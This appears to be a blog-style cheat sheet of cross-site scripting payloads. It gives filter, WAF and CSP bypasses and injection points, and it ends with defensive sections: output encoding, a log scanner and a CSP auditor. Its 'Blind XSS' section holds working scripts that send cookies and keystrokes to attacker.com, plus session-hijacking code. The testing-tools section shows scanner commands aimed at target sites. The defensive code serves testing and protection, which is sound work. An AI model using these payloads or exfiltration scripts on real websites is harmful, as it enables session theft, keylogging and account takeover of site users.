XSS Payloads

Comprehensive collection of Cross-Site Scripting (XSS) payloads and bypass techniques.

## Basic XSS Payloads

### Simple Alert

```html
<script>alert('XSS')</script>
<script>alert(1)</script>
<script>alert(document.domain)</script>
<script>alert(document.cookie)</script>
```

### Image Tag

```html
<img src=x onerror=alert('XSS')>
<img src="javascript:alert('XSS')">
<img src=x onerror=alert(1)>
<img src=x onerror=alert(document.cookie)>
```

### Input Tag

```html
<input onfocus=alert('XSS') autofocus>
<input onmouseover=alert('XSS')>
<input onfocus=alert(1) autofocus>
<input onblur=alert(1) autofocus><input autofocus>
```

## Event Handlers

### Mouse Events

```html
<div onmouseover=alert('XSS')>Hover me</div>
<div onmouseenter=alert('XSS')>Enter me</div>
<div onmouseleave=alert('XSS')>Leave me</div>
<div onmousedown=alert('XSS')>Click me</div>
<div onmouseup=alert('XSS')>Release me</div>
<div onclick=alert('XSS')>Click me</div>
<div ondblclick=alert('XSS')>Double click me</div>
```

### Keyboard Events

```html
<input onkeydown=alert('XSS')>
<input onkeyup=alert('XSS')>
<input onkeypress=alert('XSS')>
<input onkeydown=alert(1)>
<input onkeyup=alert(1)>
<input onkeypress=alert(1)>
```

### Form Events

```html
<form onsubmit=alert('XSS')>
<input onchange=alert('XSS')>
<input oninput=alert('XSS')>
<input oninvalid=alert('XSS')>
<input onreset=alert('XSS')>
<input onsearch=alert('XSS')>
```

### Window Events

```html
<body onload=alert('XSS')>
<body onunload=alert('XSS')>
<body onbeforeunload=alert('XSS')>
<body onresize=alert('XSS')>
<body onscroll=alert('XSS')>
<body onfocus=alert('XSS')>
<body onblur=alert('XSS')>
```

## Filter Bypass Techniques

### Case Variation

```html
<SCRIPT>alert('XSS')</SCRIPT>
<ScRiPt>alert('XSS')</ScRiPt>
<script>alert('XSS')</script>
<SCRIPT>alert('XSS')</SCRIPT>
```

### Encoding Bypass

```html
<!-- URL Encoding -->
%3Cscript%3Ealert('XSS')%3C/script%3E
%3Cimg%20src=x%20onerror=alert('XSS')%3E

<!-- HTML Entities -->
&lt;script&gt;alert('XSS')&lt;/script&gt;
&lt;img src=x onerror=alert('XSS')&gt;

<!-- Hex Encoding -->
&#x3C;script&#x3E;alert('XSS')&#x3C;/script&#x3E;
&#x3C;img src=x onerror=alert('XSS')&#x3E;

<!-- Unicode -->
\u003cscript\u003ealert('XSS')\u003c/script\u003e
```

### Quote Bypass

```html
<!-- Without quotes -->
<img src=x onerror=alert('XSS')>
<img src=x onerror=alert("XSS")>
<img src=x onerror=alert(`XSS`)>
<img src=x onerror=alert(XSS)>

<!-- With different quote types -->
<img src=x onerror=alert('XSS')>
<img src=x onerror=alert("XSS")>
<img src=x onerror=alert(`XSS`)>
```

### Space Bypass

```html
<!-- Tab -->
<img src=x onerror=alert('XSS')>

<!-- Newline -->
<img src=x onerror=alert('XSS')>

<!-- Carriage return -->
<img src=x onerror=alert('XSS')>

<!-- Form feed -->
<img src=x onerror=alert('XSS')>
```

### Comment Bypass

```html
<!-- HTML Comments -->
<img src=x onerror=alert('XSS')><!-- <img src=x onerror=alert('XSS')>-->

<!-- JavaScript Comments -->
<script>/*comment*/alert('XSS')</script>
<script>//comment
alert('XSS')</script>
```

## Advanced Bypass Techniques

### WAF Bypass

```html
<!-- OWASP ModSecurity -->
<svg onload=alert('XSS')>
<iframe onload=alert('XSS')>
<object onload=alert('XSS')>
<embed onload=alert('XSS')>

<!-- Cloudflare -->
<img src=x onerror=alert('XSS')>
<img src=x onerror=alert('XSS')>
<img src=x onerror=alert('XSS')>
```

### CSP Bypass

```html
<!-- Nonce bypass -->
<script nonce="random">alert('XSS')</script>

<!-- Hash bypass -->
<script>alert('XSS')</script>

<!-- Source bypass -->
<script src="data:text/javascript,alert('XSS')"></script>
<script src="javascript:alert('XSS')"></script>
```

### DOM-based XSS

```javascript
// URL Fragment
#<script>alert('XSS')</script>
#<img src=x onerror=alert('XSS')>

// Hash change
window.location.hash = "<script>alert('XSS')</script>";

// Document write
document.write('<script>alert("XSS")</script>');

// InnerHTML
element.innerHTML = '<script>alert("XSS")</script>';

// Eval
eval('alert("XSS")');
```

## Stored XSS Payloads

### Profile Fields

```html
<!-- Name field -->
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>

<!-- Bio field -->
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>

<!-- Comment field -->
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
```

### File Upload

```html
<!-- Image file -->
<img src=x onerror=alert('XSS')>

<!-- SVG file -->
<svg onload=alert('XSS')>

<!-- HTML file -->
<script>alert('XSS')</script>
```

## Reflected XSS Payloads

### URL Parameters

```html
<!-- GET parameter -->
?search=<script>alert('XSS')</script>
?search=<img src=x onerror=alert('XSS')>

<!-- POST parameter -->
username=<script>alert('XSS')</script>
password=<img src=x onerror=alert('XSS')>
```

### Headers

```html
<!-- User-Agent -->
User-Agent: <script>alert('XSS')</script>

<!-- Referer -->
Referer: <script>alert('XSS')</script>

<!-- X-Forwarded-For -->
X-Forwarded-For: <script>alert('XSS')</script>
```

## Blind XSS Payloads

### Data Exfiltration

```html
<!-- Basic exfiltration -->
<script>
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://attacker.com/steal?data=' + document.cookie);
xhr.send();
</script>

<!-- Image exfiltration -->
<img src="http://attacker.com/steal?data=document.cookie">

<!-- Form exfiltration -->
<form action="http://attacker.com/steal" method="post">
<input type="hidden" name="data" value="document.cookie">
</form>
```

### Keylogger

```html
<script>
document.addEventListener('keypress', function(e) {
  var xhr = new XMLHttpRequest();
  xhr.open('GET', 'http://attacker.com/keylog?key=' + e.key);
  xhr.send();
});
</script>
```

### Session Hijacking

```html
<script>
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://attacker.com/session?cookie=' + document.cookie);
xhr.send();
</script>
```

## Mobile XSS Payloads

### Touch Events

```html
<div ontouchstart=alert('XSS')>Touch me</div>
<div ontouchend=alert('XSS')>Touch me</div>
<div ontouchmove=alert('XSS')>Touch me</div>
<div ontouchcancel=alert('XSS')>Touch me</div>
```

### Orientation Events

```html
<div onorientationchange=alert('XSS')>Rotate me</div>
<div onresize=alert('XSS')>Resize me</div>
```

## Testing Tools

### XSSer

```bash
# Basic scan
xsser --url="http://target.com/page.php?search=test"

# With payloads
xsser --url="http://target.com/page.php?search=test" --payload="<script>alert('XSS')</script>"

# With encoding
xsser --url="http://target.com/page.php?search=test" --encode
```

### XSStrike

```bash
# Basic scan
python3 xsstrike.py -u "http://target.com/page.php?search=test"

# With crawling
python3 xsstrike.py -u "http://target.com/page.php?search=test" --crawl

# With blind XSS
python3 xsstrike.py -u "http://target.com/page.php?search=test" --blind
```

### Custom Script

```python
import requests
import re


def test_xss(url, param, payload):
    # Submit the payload in the given POST parameter and look for it
    # (or any "alert" string) reflected unencoded in the response body.
    data = {param: payload}
    response = requests.post(url, data=data)
    if payload in response.text:
        print(f"XSS detected: {payload}")
    elif "alert" in response.text.lower():
        print(f"XSS detected: {payload}")


# Test payloads
payloads = [
    "<script>alert('XSS')</script>",
    "<img src=x onerror=alert('XSS')>",
    "<svg onload=alert('XSS')>",
    "<iframe onload=alert('XSS')>",
]

for payload in payloads:
    test_xss("http://target.com/search.php", "query", payload)
```

## Prevention and Mitigation

### Input Validation

```python
# Whitelist validation
import re


def validate_input(input_str):
    # Allow only alphanumeric characters, whitespace and basic punctuation
    pattern = r'^[a-zA-Z0-9\s.,!?]+$'
    return re.match(pattern, input_str) is not None
```

### Output Encoding

```python
import html


def encode_output(input_str):
    return html.escape(input_str)
```

### Content Security Policy

```html
<!-- Strict CSP -->
<meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'self' 'unsafe-inline';">

<!-- Nonce-based CSP -->
<meta http-equiv="Content-Security-Policy" content="script-src 'self' 'nonce-random'">
```

## Testing Checklist

- Test all input fields
- Test with different HTTP methods
- Test with different content types
- Test with different encodings
- Test with different quote types
- Test with different event handlers
- Test with different tag types
- Test with different bypass techniques
- Test with different WAF bypasses
- Test with different CSP bypasses
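The "Case Variation" and "Encoding Bypass" sections above show why a filter that matches the literal string `<script>` misses most real payloads: the same markup arrives URL-encoded, as HTML entities, as hex entities, as `\uXXXX` escapes, or in mixed case. The detection logic below is an added example written for this page (not code from the original post or from any tool it mentions): it normalizes a request-log line by repeatedly decoding those encodings and only then applies case-insensitive signatures for the payload classes listed on the page (script tags, inline event handlers, `javascript:` URLs and `data:text/javascript` sources). All function names and the sample log lines are constructed for the example.

```python
import html
import re
import urllib.parse

# Signatures for the payload classes listed on this page. Matched only after
# normalization, so encoded and mixed-case variants resolve to the same form.
XSS_SIGNATURES = {
    "script_tag": re.compile(r"<\s*script\b", re.IGNORECASE),
    "event_handler": re.compile(r"\bon[a-z]{2,}\s*=", re.IGNORECASE),
    "javascript_url": re.compile(r"javascript\s*:", re.IGNORECASE),
    "data_js_source": re.compile(r"data:text/javascript", re.IGNORECASE),
}

_UNICODE_ESCAPE = re.compile(r"\\u([0-9a-fA-F]{4})")


def normalize(value: str, rounds: int = 3) -> str:
    """Undo the encodings a filter-bypass payload may be wrapped in.

    Each round applies URL decoding, HTML entity decoding (covers both the
    &lt; and &#x3C; forms from the page) and \\uXXXX unescaping. Repeating a
    few rounds catches double-encoded input; the loop stops early once a
    round changes nothing.
    """
    for _ in range(rounds):
        decoded = urllib.parse.unquote_plus(value)
        decoded = html.unescape(decoded)
        decoded = _UNICODE_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), decoded)
        if decoded == value:
            break
        value = decoded
    return value


def classify(value: str) -> list[str]:
    """Return the names of every signature that matches the normalized value."""
    normalized = normalize(value)
    return [name for name, rx in XSS_SIGNATURES.items() if rx.search(normalized)]


def scan_log(lines) -> list[tuple[int, list[str]]]:
    """Scan request-log lines; return (line_number, hits) for suspicious ones."""
    findings = []
    for number, line in enumerate(lines, start=1):
        hits = classify(line)
        if hits:
            findings.append((number, hits))
    return findings


# Constructed sample request-log lines (not real traffic): the encoded forms
# from the "Encoding Bypass" section, a mixed-case variant, and two benign
# requests that must not be flagged.
SAMPLE_LOG = [
    "GET /page.php?search=%3Cscript%3Ealert(1)%3C/script%3E",
    "GET /page.php?search=&lt;img src=x onerror=alert(1)&gt;",
    "GET /page.php?search=&#x3C;ScRiPt&#x3E;alert(1)&#x3C;/script&#x3E;",
    "GET /page.php?search=\\u003cimg src=x onerror=alert(1)\\u003e",
    "GET /page.php?search=hello%20world",
    "GET /profile?name=Alert%20Smith",
]

if __name__ == "__main__":
    for number, hits in scan_log(SAMPLE_LOG):
        print(f"line {number}: {', '.join(hits)}")
```

The signatures are deliberately coarse (the event-handler pattern will also flag harmless names such as `online=`), so this is triage input for a reviewer or a SIEM rule, not a blocking filter; the page's own mitigation section is right that output encoding and CSP, not input matching, are what actually stop the payloads.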
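The "Output Encoding" section shows `html.escape`, which is the correct encoder for text between tags and for quoted attribute values, but the "DOM-based XSS" section lists sinks in other contexts (inline script strings, URLs) where HTML entity encoding is the wrong transformation: JavaScript does not decode `&lt;`, so the value is corrupted rather than neutralized, and a `</script>` inside a string literal still ends the script block. The following is an added example for this page (not code from the original post): one encoder per output context, and a small renderer that picks the encoder matching each sink. Function names and the `render_comment` fragment are hypothetical; the payload is the `img`/`onerror` one from the "Image Tag" section.

```python
import html
import json
import urllib.parse


def encode_html_text(value: str) -> str:
    """Text between tags: html.escape handles &, <, >, " and '."""
    return html.escape(value, quote=True)


def encode_html_attr(value: str) -> str:
    """Value of a quoted attribute; the caller must wrap it in double quotes."""
    return html.escape(value, quote=True)


def encode_js_string(value: str) -> str:
    """Value placed inside a string literal in an inline <script> block.

    json.dumps yields a valid JavaScript string literal (quotes, backslashes
    and control characters escaped). The extra replacements turn <, > and &
    into \\uXXXX escapes so a value containing </script> or <!-- cannot end
    the script block early; the JS engine decodes them back transparently.
    """
    literal = json.dumps(value)
    return (literal.replace("<", "\\u003c")
                   .replace(">", "\\u003e")
                   .replace("&", "\\u0026"))


def encode_url_param(value: str) -> str:
    """Value placed into a single query-string parameter."""
    return urllib.parse.quote(value, safe="")


def render_comment(author: str, body: str) -> str:
    """Assemble a fragment, choosing the encoder by the context of each sink."""
    return (
        f'<div class="comment" data-author="{encode_html_attr(author)}">'
        f"<p>{encode_html_text(body)}</p>"
        f'<a href="/profile?name={encode_url_param(author)}">profile</a>'
        f"<script>var author = {encode_js_string(author)};</script>"
        "</div>"
    )


# Constructed sample input: the img/onerror payload from the "Image Tag" section.
PAYLOAD = "<img src=x onerror=alert('XSS')>"

if __name__ == "__main__":
    print(encode_html_text(PAYLOAD))
    print(encode_js_string(PAYLOAD))
    print(encode_url_param(PAYLOAD))
    print(render_comment(PAYLOAD, PAYLOAD))
```

The rule this illustrates: encode at the point of output, with the encoder for the context you are writing into, rather than once at input time; the same stored comment may be rendered into all four contexts on different pages.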
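Two details of the "Content Security Policy" section deserve a check in code. First, the policy labelled "Strict CSP" carries `'unsafe-inline'` in `script-src`, which is exactly what allows every inline `<script>` and `on*` handler on this page to execute; a policy that actually blocks them uses a per-response nonce (or hashes) and omits `'unsafe-inline'`, and browsers that support nonces ignore `'unsafe-inline'` when a nonce or hash is present in the same directive. Second, the `'nonce-random'` value must be freshly generated for every response, which is what the "Nonce bypass" entry (`<script nonce="random">`) relies on not happening. The block below is an added example for this page (not code from the original post): a nonce generator, a policy builder, and a small auditor that parses a policy string and reports the weaknesses discussed on the page (`'unsafe-inline'` without a nonce or hash, `'unsafe-eval'`, `data:` script sources, and missing `script-src`/`object-src`). Function names and messages are this example's own.

```python
import secrets


def make_nonce() -> str:
    """Fresh, unguessable nonce for one HTTP response (128 bits, base64url)."""
    return secrets.token_urlsafe(16)


def build_csp(nonce: str) -> str:
    """Nonce-based policy: only scripts carrying this response's nonce run."""
    return (
        "default-src 'self'; "
        f"script-src 'self' 'nonce-{nonce}'; "
        "object-src 'none'; "
        "base-uri 'self'"
    )


def parse_csp(policy: str) -> dict[str, list[str]]:
    """Split a policy string into {directive: [source expressions]}."""
    directives = {}
    for part in policy.split(";"):
        tokens = part.split()
        if tokens:
            directives[tokens[0].lower()] = tokens[1:]
    return directives


def audit_csp(policy: str) -> list[str]:
    """Return the script-related weaknesses found in a policy string."""
    directives = parse_csp(policy)
    # script-src falls back to default-src when absent, as browsers do.
    script = directives.get("script-src", directives.get("default-src", []))
    has_nonce_or_hash = any(
        s.startswith(("'nonce-", "'sha256-", "'sha384-", "'sha512-")) for s in script
    )
    issues = []
    if "'unsafe-inline'" in script and not has_nonce_or_hash:
        issues.append("script-src allows 'unsafe-inline': inline <script> and on* handlers execute")
    if "'unsafe-eval'" in script:
        issues.append("script-src allows 'unsafe-eval': eval() and similar sinks execute strings")
    if "data:" in script:
        issues.append("script-src allows data: URLs: <script src=\"data:text/javascript,...\"> executes")
    if "script-src" not in directives and "default-src" not in directives:
        issues.append("no script-src or default-src: scripts from any origin allowed")
    if "object-src" not in directives and "default-src" not in directives:
        issues.append("no object-src: plugin content unrestricted")
    return issues


def render_page(nonce: str, inline_script: str) -> str:
    """Emit the policy plus the page's own inline script tagged with the nonce.

    Untrusted content rendered elsewhere on the page never receives the nonce,
    so injected <script> or on* markup is blocked by the policy.
    """
    return (
        '<meta http-equiv="Content-Security-Policy" '
        f'content="{build_csp(nonce)}">\n'
        f'<script nonce="{nonce}">{inline_script}</script>'
    )


# The policy the page labels "Strict CSP", reproduced here as the weak case.
WEAK_POLICY = "default-src 'self'; script-src 'self' 'unsafe-inline';"

if __name__ == "__main__":
    print("weak policy:", audit_csp(WEAK_POLICY))
    nonce = make_nonce()
    print("nonce policy:", audit_csp(build_csp(nonce)))
    print(render_page(nonce, "console.log('page script');"))
```

Delivering the policy as a `Content-Security-Policy` response header rather than a `<meta>` tag is preferable in practice, since the header form also supports `frame-ancestors` and reporting directives; the policy string from `build_csp` is the same either way.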

January 10, 2025 · 4 min